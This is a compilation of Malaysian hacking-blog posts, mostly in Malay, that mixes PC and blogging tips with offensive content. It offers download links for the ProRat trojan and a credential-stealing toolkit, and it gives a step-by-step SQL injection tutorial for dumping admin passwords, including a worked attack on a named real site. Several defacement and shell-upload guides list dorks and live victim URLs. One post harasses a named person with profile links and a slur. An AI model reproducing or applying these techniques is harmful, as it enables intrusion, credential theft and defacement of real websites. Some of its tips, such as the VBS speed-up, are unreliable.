John The Ripper [JTR]

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker.
It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/ XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


Download John the Ripper for Windows here
Download John the Ripper for Linux here


For John the Ripper (JTR) Windows tutorial here

CC:Airdemon/Apiz Seth-Tan

ProRat Trojan



ProRat adalah virus backdoor yang berasakan Microsoft Window, lebih dikenali sebagai RAT (Pentadbiran Alat Jauh). Sebagai Trojan, ia menggunakan klien dan pelayan. ProRat membuka port pada komputer yang membolehkan pelanggan untuk melaksanakan pelbagai operasi pada pelayan (mesin dikawal). ProRat adalah terdapat di versi percuma dan versi berbayar. Dalam versi percuma, ProRat tidak boleh menyambung kepada pengguna melalui rangkaian kawasan luas (WAN), hanya lebih LAN (Rangkaian Kawasan Tempatan). ProRat dikenali untuk pelayan menjadi hampir mustahil untuk mengalihkan tanpa perisian antivirus.
Sebelum mggunakan Tool ni..Disable kan antivirus dulu.
Ciri-ciri:

   Logging keystrokes 
Stealing passwords
   Full control over files 
   Drive formatting
- Open/close CD tray
- Hide taskbar, desktop, and start button
- Writing on-screen
- Movement of cursor
- Take screenshots
- View system information
- View webcam
- Download & run files

Download ProRat_v1.9_Fix2 (Zip) here

CC:Airdemon/Apiz Seth-Tan

Tool untuk crack password



Kali Nie pulak Tool Yang Agak Best

Application Cracking Kit v2 kit dengan 132 fail dengan bagi password crack, steales.. Sesetengah fail RAR punya password tetapi itu adalah sama ada to0l-asas, mrdel2000 atau zmetex.

Toolkit termasuk alat seperti Siri Thief, PwdDevil, MSN Spy Lite, cisco_decode, PassStealer, Hydra, John Ripper, pwdump, samdcrypt, email_crack, netbrute_scanner, rainbowcrack, pop3_hacker, Brutus, cachedump, fcrack, ciscovpn, md5crack, Pemulihan WinRAR Kata Laluan, samdump, tsgrinder, winrtgen dan banyak lagi.

Download Cyb3rjunk13 Cracking Toolkit v2 (ISO) here
Download Cyb3rjunk13 Cracking Toolkit v2 (RAR) here

CC:Airdemon/Apiz Seth-Tan

Siapakah Dia?

Login Denied TD 
berwajah keanak-anakkan  dan bercita menjadi seorang scammer dan 'hacker'<--O.o  yang berjaya sampai sanggup menipu demi duit dan juga populariti...kehkehkehkehkk...

ni fb fake dia yang dikenali sebagai Login Denied TD
https://www.facebook.com/dnshacker 
profile picture yang digunakan oleh dia merupakan penipuan semata2..dia mengatakan gambar tersebut adalah miliknya 100% tetapi damnnnnn...dia menipu :P gambar2 tersebut telah dicuri daripada seorang mamat yang juga salah seorang friends fb real dia....

https://www.facebook.com/profile.php?id=100000761756460 <---ni tuan punya DP yg dia curi

muka asal Login Denied
https://www.facebook.com/ChillzCrew       

Muhammad Amirul arrasyid



SOALAN BONUS
: cer try teka mana satu LoginDenied?

Budak-budak Gay hahaha
SumBer:Sini

Domain & Hosting

Jika anda inginkan laman web dengan nama pilihan anda sendiri, contohnya http://www.laman-web-www.laman-web-aku.com, apa yang perlu anda dapatkan ialah domain dan hosting. Berikut merupakan sedikit penerangan tentang domain dan hosting:

Apa itu domain?
Domain adalah alamat untuk laman web anda. Contohnya, domain bagi laman web yang anda sedang layari ini adalah http://sembangkomputer.com. Fikir dahulu masak-masak nama apakah yang anda letak sebagai domain anda, kerana alamat inilah yang orang ramai akan taip di web browser untuk pergi ke laman web anda. Oleh itu, ia haruslah ringkas dan mudah diingati.

Apa itu hosting?
Hosting pula berfungsi untuk menyimpan segala data-data mengenai laman web anda. Ia akan menyimpan fail, teks, gambar, dan segala kandungan dalam laman web anda supaya boleh dilawati oleh orang ramai.

Bagaimana nak mendapatkan domain dan hosting?
Banyak syarikat-syarikat yang menawarkan perkhidmatan domain dan hosting. Antaranya ialah DataKL. Anda hanya perlu pergi ke laman web tersebut dan pilih salah satu dari mana-mana pakej yang ditawarkan. Biasanya, bayaran secara online akan dibuat menggunakan kad kredit atau PayPal. Tapi jangan bimbang jika anda tidak mempunyai kad kredit atau PayPal, kerana anda juga boleh membuat bayaran secara bank-in di cawangan Maybank yang berdekatan.


Saya dah ada domain dan hosting. Apa seterusnya?
Ok, sekarang anda dah sedia untuk lancarkan laman web anda agar boleh dilawati oleh seluruh dunia. Jika anda ingin membuat laman web dengan cara mudah, anda boleh menggunakan CMS seperti Joomla!, Zen Cart, Drupal, dan sebagainya. Jika anda ingin membuat blog, WordPress adalah pilihan yang terbaik. Sekiranya segala kandungan laman web anda sudah siap, letakkan ia kepada hosting anda menggunakan perisian FTP, ataupun melalui cPanel.

Nota: Link DataKL di atas adalah merupakan link affiliate saya. Jika anda membeli domain atau hosting melalui link tersebut, saya akan mendapat sedikit ganjaran dari DataKL dan membantu dalam pembangunan blog ini. Terima kasih.

Theme Change

Contoh Fb Alex
Hello,Alex_was_here,oke hari ni aq nk ajar korang Tukar Theme.xseronok dengan theme lama boleh tukar yang Baru Tool Ini mungkin dah ramai yang tahu tetapi kami ingin menshare lagi kepada yg belum thu..tool ini Akan mengubah theme Site Yg Ternama Sahaja seperti..Facebook,google,youtube,tumblr,dan lain-lain lagi

Download Link:-

Stylish Google Chrome

Stylish Mozilla

Dah Download Pergi Ke Site Nie theme collection.
Sekarang Kita Cuba Tukar Facebook theme mengunakan browser Google chrome
Buka website theme Collection tekan Facebook.Tekan nama theme yg korang nak lalu
tekan ''install with Stylish''dekat Site Tadi


Lepas Tekan ''Instal with Stylish'' dye akan keluar satu popup Button hanya tekan button ''ok''
Mcm Gambar dkt bawah

Tekan Ok je

Selepas itu theme Facebook korang siap di Install!. Kalau nak disable/enable theme ni pergi ke
kanan atas selali klick right sekali dan tekan disable
Contoh Disable
#Klu nk delete Theme Tekan Options je

Seterusnya korang boleh tekan button Disable untuk kembalikan theme Facebook kepada asal. Kalau korang nak guna theme yang lain pula, caranya sama macam di atas, tapi pastikan hanya satu theme untuk sesuatu website je boleh aktif. Sebabnya kalau banyak theme Facebook aktif dalam satu masa boleh buat web browser korang jadi berat dan sangkut masa nak layari website tersebut.


AutoPost

Asalamualikum,Anda bersama Admin AhmadAdli..HAri ini Gua nak kasi tool best of the best..bru je jumpe Maklumlah site noob XD..Tool nie Bkn Auto like tpi sama la sikit kan ada auto dekat depan hheheh cakap banyak lak aq..
Tool Ini DiBeri Nama FreeLikeHits@FBpost.Tekan Sini AutopostMacam Bawah nietool nie dye akan post dekat group wall member fan page dan lain-lain
rekaan only

Admin xthu jika anda Dimaki hamun sebb spam fb dyeorg

Deface Guna WebDav

asalamualikum,Alex Hc Was Here.heeheh Tkut x??..tutorial kali ini tutorial deface site mengunakan WebDav
Yang Diciptakan Oleh Hmei7 .Hmei7 Berasal Daripada Indonesia.beliau mencipta tool ini Khas kepada peminat hacking,deface dan sebagainya..Tpi klu nk Hack Website yang Mempunyai vuln

WebDav Google Dorks

Lgi senang jika ada orang share bagi
Or terjumpa
Site Vuln WebDav

SQL Injection Step By Step Full Tutorial



Kata kunci yang perlu diketahui
-------------------------------
karakter : ', -
comments : /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x ke atas

Google Dork yang akan di gunakan ialah -->


"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="

-------------------------Langkah Pertama-------------------------

 www.target.com/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh inject code :-

www.target.com/news.php?id=1'
atau
www.target.com/news.php?id=-1

Contoh pesan error :-
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

-------------------------Langkah Kedua-------------------------

Cari jumlah table yang ada di dalam database.
tambahkan : +order+by+1-- diakhir url

Contoh:

Code:
www.target.com/news.php?id=1+order+by+1--
atau
www.target.com/news.php?id=1+order+by+1/* periksa secara bepringkat
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/*cari sehingga error keluar

Untuk tutorial ini jumlah table yg diperolehi ialah 3.

-------------------------Langkah Ketiga-------------------------

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
perintah yang akan digunakan : +union+select+1,2,3-- diakhir url


Contoh
www.target.com/news.php?id=1+union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka (2),

contoh:
www.target.com/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

version() = untuk lihat version msql yang digunakan
database() = untuk lihat name database yang digunakan



-------------------------Langkah Keempat-------------------------

untuk nampakkan nama2 table yang ada di web tersebut, perintah
table_name letak di angka yang keluar tadi --> (2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
atau kita tambah perintah karekter - di depan angka pertama
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--

-------------------------Langkah Kelima-------------------------

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Masukan selepas angka yang terakhir.

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

-------------------------Langkah Enam-------------------------

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin--

(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)

------
|info|
------
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

-------------------------Langkah Ketujuh-------------------------

Keluarkan hasil isi yang kita berjaya peroleh dari table Admin

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

-------------------------Langkah Terakhir-------------------------

Cari Login untuk Admin Pages.

Deface NEW !!


Google Dork: inurl:/forums.asp?iFor=  Pilih target... Contoh target http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=17



Buang Number ( 17 ) Tu Seperti Bawah ini.. http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=



Selepas Buang ( 17 ) Tu = masukan SQL inject 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users



Contoh Dia Kan Menjadi Seperti ini.. http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users





10 TOPICS itu adalah USERNAME, Dan yang berderet dekat Bawah DATED  tu PASSWORD Cari Login, Dan maksud Kan salah satu USERNAME & PASSOWORD Yang Tersenarai tadi..





Bila dah Berjaya Login Masuk Anda Cari Perkataan POST NEW TOPIC, tekan di situ dan maksud Kan Html Anda, Lepas Dah Masukan HTML anda Tadi Di New Post, Cari Post Anda Tadi  CONTOH nanti dia akan Menjadi Seperti Ini http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=578&iFor=16

IDM 6.10 patch

Asalamualikum,hahahahah...lama xupdate oke skng Aq selaku admin disini nk buat entri yg Bertajuk IDM..
IDM?? IDM ialah tool untuk mendonload dgn lebih laju..Lju ke?haxhaxhax..rasenya x...
hari nie nk kongsi ler tool patch and installer dye..sje nk buat entri dripd mende tue dripade duk menyemak dalam Laptop XD..Mengarut je aq nie!!


Gif

Okey gif nie aq buat guna photoscape best owh

jom tempah free sahaja

Kepentingan feed kepada blog dan visitor

 
RSS ialah singkatan bagi Really Simple Syndication. Ia merupakan kaedah membaca blog atau web yang kita minati dengan mudah dan senang. Sejak kewujudan jutaan blog yang mencetuskan fenomena hebat di alam cyber,kaedah untuk membaca blog menjadi semakin sukar.Malahan pengetahuan tentang SEO dan persaingan merebut tempat pertama di muka depan carian enjin carian semakin hebat. Tak mungkin anda mampu membaca ratusan blog dalam masa sehari. Oleh kerana itulah kita memerlukan reader bagi RSS ini. RSS sekarang wujud di dalam pelbagai bentuk,antara yang popular ialah dalam bentuk button.

Kelebihan RSS/ Feed/ 


Terdapat pelbagai reader atau pembaca bagi RSS ,ada yang berbayar dan ada yang percuma. Hanya pilih blog yang anda minati dan suka membaca contentnya,masukkan ke dalam pembaca RRS anda. done! Apabila blog berupdate ,ianya akan dihantar terus ke pembaca RSS anda. Apa kelebihannya? Katakan anda minat terhadap 20 blogger terkenal di Malaysia.adakah anda akan membuka,satu-demi satu blog tersebut,atau hanya membuka pembaca RSS anda yang di dalamnya terdapat entry baru dari blogger tersebut tanpa perlu anda 'berjalan' dari satu blog ke satu blog.

Jom demo,kat bawah nie, sila klik button kat bawah nie




Satu lagi RSS lebih bersih,clean tanpa iklan yang banyak,tanpa widget.tanpa hiasan,tanpa bau wangian( eh??) dan pelbagai warna yang menghiasi blog. Bagi saya, menggunakan feedburner. Ianya pembaca RSS atau feed( entry terbaru blog) yang percuma. Jadi kalau pembaca blog ini suka kepada entry atau posting saya boleh terus berlanggan di sini. Feedburner ini apabila anda masukkan email anda, anda akan dapat membaca entry terbaru dari blog LoveHijau di email anda secara outomatik,tanpa perlu anda pergi menerjah blog saya.


Bagi blogger pula anda sebenarnya membina talian ukhwah yang berkesan dengan pembaca anda. Hargai mereka dengan posting anda di box email mereka. Malahan jika pembaca blog anda mendapati bahan atau posting anda sangat berguna ,kekalkan mereka melalui pembaca feed ini. Bina nama blog anda untuk jangka masa panjang. Jangan sisihkan pembaca setia anda.

Jaminan E mail anda Tidak akan di Spam

Macam mana nak ada email spam. Anda hanya akan dapat e mail yang sebijik dan serupa dengan apa yang saya tulis di dalam blog. Tak ada iklan seperti nuffnang,innity dan sebagainya, tak ada promosi affiliate, tak ada promosi jual barang dan lain-lain. E mail anda merupakan rahsia dan selamat dari sebarang spam. Feedburner nie bukan jual email kita atau dedahkan email untuk mereka untung. Tengok kekuatan pagerank mereka di google. Satu lagi jangan lupa setelah anda masukkan email anda tekan butang subscribe. Lepas tu semak email anda,mereka akan hantar link yang meminta anda aktifkan subscribe anda tadi, klik link untuk aktifkan,done! Anda akan menerima email yang mengandungi RSS atau feed atau posting terbaru anda di email anda,tanpa perlu melawat ke blog saya,tapi kalau sudi marilah selalu kat sini. Jom join feed LoveHijau.com kat bawah nie. free aje dan e mail anda 100% selamat dari sebarang spam atau bocor...


Enter your email address:

Delivered by FeedBurner
Credit:Lovehijau

Tukar favicon blog

Apa itu Favicon??
Favicon merupakan satu icon kecil yang terletak pada awal sebelum alamat blog kita atau web site kita.Macam saya menggunakan lambang daun, sesuaikan dengan nama blog yang tak seberapa nie.
Cara yang mudah untuk tukar lambang atau favicon dari defaut atau lambang asal blogger tersebut.


Caranya:


  • Log in akaun
  • Dashboard -Design -Page Elemen.
  • Klik edit

  • Akan keluar windows baru macam kat bawah nie:




  • Lepas tu ,klik browser,cari dekat komputer anda gambar atau lambang yang di simpan di hard disk .Tekan save, hingga windows jadi seperti di bawah, tataa,...dah siap




  • Lepas nie alamat blog anda akan jadi macam nie
Dekat mana nak cari favicon...
haa senang sahaja ........................................
just pergi dkt google taip ''favicon for blogger''

Password

Kumpulan Gnosis pernah melancarkan serangan hacker berprofil tinggi pada rangkaian yang paling popular di dunia blog. Mereka mendakwa bahawa telah hack 1,3 juta password pengguna, 188,279 telah ditunjukkan kepada orang ramai. Ini adalah 50 password popular yg terlalu “lemah”. check it out~


Nampak tak carta kat atas tu, pengguna paling suka pakai password 123456. Penggunaan password yang tak selamat camtu boleh mengundang risiko kepada pemiliknya. Tak tau la sama ada diorang memang suka nombor tu atau diorang memang taktau pasal keselamatan dalam internet. Kalo hacker tu jenis baik macam Rilekscrew takpela sebab diorang ni hanya nk test-test je, kalau yg jahat-jahat tu abis la. Kemungkinan diorang akan guna akaun korang untuk wat jahat…

Untuk mengelakkan blog atau laman web sosial anda seperti facebook korang kena hack, jgn la pakai password yg mudah-mudah. Pakai la password yg “strong”. Strong maksudnya password korang tu adalah gabungan huruf dan nombor. Contohnya c0m3l12345, nak hack password yg guna gabungan huruf dan nombor lebih susah. Jadi kalo sebelum ni korang tak pikir sgt soal password korang, lepas baca entry nie hati-hati la.

p/s: kepada yang guna password-password yang senang tu boleh la tukar yek.. jangan lupa bagitau rakan-rakan yang lain :)

tips jimatkan bateri laptop

Asalamualikum,admin blog nie sudah makin bertambah 2 Elite 1Lamer...
Ok berbalik kepada tajuk...''tips jimatkan bateri laptop''
cakap bateri semua orang kenal kan tidak kira budak hingga tua semua tahu

Aktiviti yang terus menerus pada laptop akan menyebabkan kuasa bateri berkurangan dengan cepat. Disini dinyatakan tip-tip yang boleh anda lakukan untuk menjimatkan bateri pada laptop anda:


  • Turunkan kecerahan skrin laptop anda. Untuk mengurangkan anda boleh setkan pada menu “brightness” pada laptop anda.

  • Disable keyboard backlighting khususnya untuk produk Macintosh yang mana anda perlu cari menu keyboard tab.

  • Tetapkan Energy Saver untuk mengurangkan putaran hardisk. Buka control panel pilih power option dan setkan mengikut keperluan anda

  • Tetapkan Laptop pada kedudukan standby. Ini dapat menjimatkan bateri semasa anda tidak mengunakannya walaupun laptop masih “on”.

  • Keluarkan optical disk seperti cd atau dvd dalam dvrom. Ini adalah kerana jika terdapat optical disk dalam dvdrom atau cdrom ia akan berputar walaupun tidak membuka atau membacanya.

  • Tambah ram yang banyak atau meningkatkan kuasa memori laptop.

  • Menaip menggunakan aplikasi notepad bukannya Microsoft word. Siap menaip baru mengeditnya dalam Microsoft word.

  • “OFF” semua applikasi yang tidak digunakan seperti wireless, webcam, usb dan sebaginya jika anda tidak menggunakannya.

    * jangan mengecas laptop ketika bermain kerana itu akan berlakunya "bateri kondem''

  • TinyFileBrowser ~ Remote file Upload Vulnerability


    Title : TinyFileBrowser  ~ Remote file Upload Vulnerability
    Google Dork : "inurl:tinybrowser/upload.php"


    Lets Start : Open google.com/ncr or you country dOmain like Google.co.in and enter This dork
    "inurl:tinybrowser/upload.php"


     Vulnerable website's title will TinyBrowser :: Upload in search results
    and in sOme sites it will show you website directory in title :)
    click on Vulnerable website only ... igNore sOme extra results


    For uploading Your files click on upload ... and click on browse to view Your Uploaded File :)
    you can upload [.html],[.txt],[.jpg],[.gif],[.bmp] [.php not allowed] but atleast you can try as
    php.jpg :P ... but in sOme websites you can upload images and txt file Only .. but
    dont worry ... u can notify your deface as image or text file :D

    Must levae a comment if you like this Post :)


    "Nothing is impossible in this world even Nobody is Perfect "

    Website Hacking With Moxiecode File Browser


    Open google.com and enter this dork intitle:Moxiecode File browser filetype:php
    select website from search results
    The Exploit url will be like this


    http://[site]/../../js/tiny_mce/plugins/filemanager/upload.php


    Live Demo : http://www.dancetag.tv/admin/dancetagExtension/scripts/tiny_mce/plugins/filemanager/frameset.php
    (Demo site is patched its just a example ... Find a new site for uploading your deface)


    after Going to This page see icons in header of page, serach for upload
    new file icon


    after clicking on Upload new file icon you'll see a new pop up for upload new files


    for Preview your uploaded file go to : site.com/images/urfile if you uploaded a image
    and if you have uploded .html file see it here site.com/files/deface.html


    or http://[site]/../../js/tiny_mce/plugins/filemanager/files/deface.html

    Tinymce ajaxfilemanager remote file upload vulnerability

    hello Guys I'm Back with Another Remote Upload Vulnerability, its TinyMCE ajaxfilemanager,
    Lets Start 
    Open Google.com and enter this dork 
    "tiny_mce/plugins/ajaxfilemanager"
    select any website from search search results
    the vuln website will be like this http://site.com/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
    you can upload .txt],[.jpg],[gif],[bmp] files here ... you can upload your shell in some sites as php;.jpg but in most sites you can upload txt deface only :|




    You'll see your uploded file here 
    http://site.com/images/yourfilehere
    or http://site.com/uploded/tmp/yourfilehere 
    Note: The Path May be chnaged in other websites, I' Not sure about it ,so comment here if you did not found your uploded file in any site 




    Live demo :- http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#

    "Default Image Uploader <+ Shell Upload Vulnrability"

    [x] Title : "Default Image Uploader <+ Shell Upload Vulnrability"
    [x] Date : 25/Oktober/2011
    [x] Author : Z190T
    [x] Contact : mahruz.id[at]gmail[dot]com
    [x] Platform : PHP/ASP
    [x] Category : WebApps
    [x] dork :
        * inurl:"default_image.asp"
        * inurl:"default_imagen.asp"
        * inurl:"/box_image.htm"
    [x] Tested on : anything OS,,,

    **** exploit ****
    - Shell Example : shell.asp;.jpg, shell.php;.jpg, *.gif, *.jpg, *.png, *.pdf, *.zip, *.html

    **** note ****
    - then upload them to your shell using firefox addons temperdata. or NOT!! ^_^

    **** demo ****
    - https://www.thinkheartland.com/CMS/admin/default_Image.asp
    - http://www.dautphetal.de/edit/default_asset.asp

    Deface Website Dengan CKfinder

    Asalmulaikum all :)
    Mike ni boleh ler dikira  wirter baru blog ni
    tapi takpelah..
    share je apa mike tau

    Ni Mike Jumpa Kat Blog Indonesia Ni
    Tapi Admin Tak kenal :3
    http://java-cyber.blogspot.com/
    Ok Let Start!
    Dork

    intitle:Index of /ckfinder
     inurl:CKfinder/ckfinder.html 

    Ok Pilih Target Korang Suka :D
    Example:
    Then?
    Upload Lah Deface Korang.Tapi Extension Cuma .txt
    Live Target:
    - http://e4.escriba.com.br/ckfinder/ckfinder.html
    - http://ozoda.net/ckfinder/ckfinder.html
    - http://www.dobler-metallbau.com/ckfinder/ckfinder.html


    Contoh Mike Dapat:
    http://e4.escriba.com.br/ckfinder/userfiles/files/mike.txt

    Peringatan kepada penguna android

    Kadang-kala peralatan canggih boleh diubah menjadi perumah kepada penjenayah keselamatan maya. Tetapi bagaimana pengguna dapat mengelakkan ‘jangkitan’ dan ‘perebakan’ yang berlaku dalam telefon pintar atau komputer tablet?

    Biasanya apabila anda berfikir mengenai virus, spyware atau apa-apa ancaman keselamatan siber, tentu saja anda terfikirkan mengenai komputer peribadi. Kerana majoriti serangan siber biasanya berlaku dalam komputer peribadi. Malware di telefon mudah alih? Atau komputer tablet? Bolehkah berlaku? Sememangnya boleh berlaku terutamanya jika peralatan mudah alih anda menggunakan sistem operasi seperti Android.

    Menurut Juniper Networks, contoh malware Android meningkat dengan mendadak sehingga 472 peratus dalam tempoh Julai sehingga November 2011. Penggodam telah mengisytiharkan perang terhadap Android dan sebagai pengguna mungkin mereka terkena tempiasnya.

    Bak kata Sun Tzu dalam Seni Peperangan, ‘jika anda kenal musuh anda, anda boleh menang beratus-ratus peperangan tanpa kalah’.

    Awas! Peringatan Kepada Pengguna Android

    Di sini terdapat lima musuh utama yang perlu pengguna Android ketahui dan bagaimana untuk mengalahkan mereka dalam permainan ini.


    SMS Trojans

    Menurut laporan Juniper yang sama, hampir separuh aplikasi seakan-akan Android yang berniat jahat yang beredar sekarang adalah SMS Trojan yang menghantar mesej teks dalam latar belakang (tanpa pengetahuan pengguna) kepada beberapa nombor telefon yang dimiliki penggodam.

    Akibatnya sebagai pengguna anda terbeban dengan bil bulanan yang melambung. Jalan terbaik untuk menghentikan SMS Trojan adalah dengan mengelak terkena jangkitannya.

    Justeru gunakan bantuan keselamatan Android yang direka khusus bagi memerangi semua serangan yang menimbulkan ancaman. Jangan menggunakan aplikasi yang kelihatan mencurigakan atau kelihatan amat sempurna dan baik.


    Carrier IQ

    Penghujung tahun 2011, penyelidik mendapati rootkit pembangun perisian Carrier IQ beroperasi pada berjuta-juta peralatan mudah alih. Walaupun kelihatan tidak mencurigakan, kod berkenaan dilaporkan merekodkan lokasi termasuk kata laluan.

    Malangnya semua ini berlaku tanpa pengetahuan pengguna dan tanpa pilihan melumpuhkan penggunaanya. Bagi mengawal ancaman berkenaan dapatkan Carrier IQ Test, aplikasi percuma yang dapat mengesan dan membuang perisian yang tidak dibenarkan.


    Aplikasi Preloaded

    Biasanya telefon pintar atau tablet didatangkan dengan bonus seperti aplikasi, perisian yang tidak termasuk dengan Android tetapi telah ditambah oleh pengilang.

    Disember tahun lalu, penyelidik mendapati terdapat aplikasi preloaded yang mendedahkan keselamatan pengguna seperti yang biasa digunakan untuk mencuri data peribadi atau mencuri dengar perbualan telefon.
    Atau lebih teruk lagi kerana kebanyakan aplikasi ‘diadun’ bersama-sama OS dan tidak boleh dibuang.

    Jika pengguna menggunakan Android 4.0 (Ice Cream Sandwich), mereka boleh menyembunyikan dan melumpuhkan aplikasi bloatware. Hanya dengan masuk ke Settings, Device, Apps, pergi ke All kemudian aplikasi yang mahu dibuang dan tekan Disable.


    Kedai palsu Google Play

    Awal tahun, Google telah mengubah Android Market kepada Google Play di mana ia menggabungkan beberapa perkhidmatan seperti aplikasi, muzik, e-book.

    Bagaimanapun penjenayah siber mula mencipta domain Google Play palsu bagi menipu pengguna memasang aplikasi berbahaya. Cara melawan ancaman berkenaan adalah dengan menjadi lebih pintar.

    Jangan memasang aplikasi Google Play dengan memuat turun sendiri tapi ikutlah peraturan biasa untuk mengemaskini peralatan OS. Perisian keselamatan Android boleh mengesan dan membuang segala aplikasi mencurigakan yang mungkin dipasang tanpa pengetahuan.

    Jadi lebih baik gunakan anti-malware pada peralatan mudah alih.


    Peringatan palsu

    Jika anda mendapat mesej daripada bank berbunyi ‘Akaun anda bermasalah! Kemaskini kata laluan.’ Pergi ke link berkenaan membawa pengguna ke laman web yang sama dengan bank yang anda selalu lawati. Jika pengguna masuk ke akaun berkenaan, ia akan membuka laluan menjadi mangsa jenayah siber mencuri semua data peribadi pengguna.

    Jangan sekali-kali masuk ke link yang terdapat di dalam e-mel atau mesej teks walaupun kelihatan memang sama. Pastikan anda buka perayauan dan sambung kepada institusi kewangan secara terus dan pastikan URL bermula dengan https:// dan kini beberapa institusi kewangan yang mempunyai pelbagai langkah-langkah keselamatan bagi menjaga hak pengguna. Dan jika pengguna masih ragu-ragu mengenai keselamatan, hubungi institusi kewangan untuk berurusan secara terus. – Utusan

    Credit-nizarazu-

    Tutorial Remove Shortcut Virus in Pendrive

    Just follow the below steps …..

    Click on "Start" -->Run --> type cmd and click on OK. Here I assume your pen drive letter as K: Enter this command.

    attrib -h -r -s /s /d k:\*.*

    You can copy the above command --> Right-click in the Command Prompt and paste it. Note : Don't forget to replace the letter k with your pen drive letter. Now press "Enter". That’s it!!!!

    Sorry english!!,just copy n paste =]
    credit:Macho Cyb3rs3c

    Love imej

    *contoh imej love
    Asalamualikum,tuto pada malam nie admin nk buat love imej...
    senang je ^^

    Sape yg terer maths leyh cuba nie..........
    *copy code dibawah
    (sqrt(cos(x))*cos(200x)+sqrt(abs(x))-0.7)*(4-x*x)^0.01, sqrt(9-x^2), -sqrt(9-x^2) from -4.5 to 4.5

    Dah Copy?
    >Lepas copy gi dekat http://www.google.com.my
    >pilih seach
    >paste code
    >And Enjoy xD

    Gempak

    Potato chager
    MenJadi Ke?? 0.o...
    sape yg try tue menjdi share larh dkt admin nanti
    k!!
    Bye!!Bye!!Bye!!

    bina bluetooth

    ‎#Buat/ bina bluetooth dlm pc

    Ok..
    Hari nie admin nak ajar korang Cara Buat/Bina Bluetooth Dalam 
    Window XP Dan Window Vista...
    So , aku tak nak cakap banyak lagi , nanti korang bosan plak..
    Hahaha..
    Jom mulakan..

    Start > Run > Type " CMD " > Klik Enter > Taip " TSQUIRT "

    Bile Sume yang kat atas tu daa buat , BLUETOOTH FILE
    TRANSFER WIZARD terbukak..

    P/S: Sesetengah komputer memang tak adew file camnie..
    Yang mana ada tu , semoga bermanfaat untuk korang...
    Assalamualaikum..

    credit:CyberHacker

    Lajukan laptop dan sebagainya

    Salam , Halow , :D
    Dah lama kan admin x update trik ? 
    okeii malam nie admin nak share care lajukan pc / laptop / noteboo k dan sewaktu dgn nya , :D

    Steps : 

    1.buka notepad dan masukkan kod registry ini mystring=(80000000)

    2.selepas itu simpan dengan men-klik save as ram.vbs ingat!..jangan save dimana-mana tapi hanya save di tesktop sahaja.

    3.dan langkah terakhir klik 2x icon tersebut siap,selepas itu korang dapat rasakan efect daripada software tersebut...

    Jika ade jadi sila la Komen Ya :D

    Credit:CyberHacker

    7 god mode

    Halo bersama saya , entry kali ni , admin nak share Window 7 god mode , 

    Tidak dinafikan memang kebanyakkan daripada kita sudah mengetahui mengenai fungsi "God Mode" ini di dalam sistem pengoperasian Window. Dan tidak diketahui juga kenapa dan mengapa fungsi ini disembunyikan oleh pihak Microsoft. Oleh itu, pada entri kali ini sekadar entri "melepaskan batuk ditangga sahaja" :D

    Apa itu God Mode ?

    Fungsi God Mode membenarkan pengguna menukar dan mengubah keseluruhan tetapan Windows 7 dalam hanya satu folder. "Hanya dalam 1 Folder Sahaja". Ok mari kita buat dan lihat.

    Caranya begini :

    -Buat satu folder pada desktop.

    -Salin perkataan ini GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

    -Namakan semula folder itu tadi kepada nama kod diatas.
    ( nak senang anda namakan dulu folder tu kemudian baru rename balik ya ;) )

